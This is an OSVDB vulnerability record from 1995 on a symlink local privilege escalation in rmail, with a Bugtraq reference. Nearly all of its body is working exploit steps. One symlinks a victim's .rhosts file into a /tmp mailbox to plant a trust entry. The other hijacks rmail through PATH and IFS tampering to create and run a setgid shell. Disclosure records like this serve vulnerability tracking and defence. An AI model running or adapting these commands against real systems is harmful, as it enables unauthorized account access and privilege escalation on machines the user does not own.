rmail Symlink Local Privilege Escalation

1995-09-01T00:00:00
ID OSVDB:430
Type osvdb
Reporter OSVDB
Modified 1995-09-01T00:00:00

Description

Manual Testing Notes

ln -s ~joe/.rhosts /tmp/mbox.joe
echo "localhost yourname" | rmail joe

--

mkdir /tmp/.rmail
cd /tmp/.rmail

cat <<EOF>usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .

Set PATH, IFS, and run rmail.

setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail joeuser@nohost.com
unsetenv IFS

Minor cleanup.

rm -f usr sh
echo "Attempting to run sgid shell."
./mailsh

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/1995_3/0219.html